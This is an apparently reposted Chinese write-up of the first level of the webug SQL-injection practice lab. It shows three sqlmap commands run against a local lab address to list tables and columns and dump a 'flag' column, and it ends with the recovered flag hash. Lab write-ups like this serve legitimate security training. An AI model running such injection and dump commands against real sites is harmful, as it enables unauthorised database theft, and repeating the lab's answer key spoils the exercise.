webug通关实记

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了webug通关实记相关的知识,希望对你有一定的参考价值。

webug通关实记

1.

 

 

技术分享

get注入,放到sqlmap里跑一下

首先查看他使用哪个数据库

技术分享

 

sqlmap.py -u “http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1“ -D pentesterlab --tables

 

技术分享

 

sqlmap.py -u "http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

 

技术分享

 

sqlmap.py -u "http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag --dump

 

技术分享

 

最终结果为204f704fbbcf6acf398ffee11989b377

以上是关于webug通关实记的主要内容,如果未能解决你的问题,请参考以下文章

webug通关3

漏洞扫描工具AWVS介绍及安装教程丨黑客入门

webug学习

webug第七关:越权

webug第十关:文件下载

webug第九关:URL跳转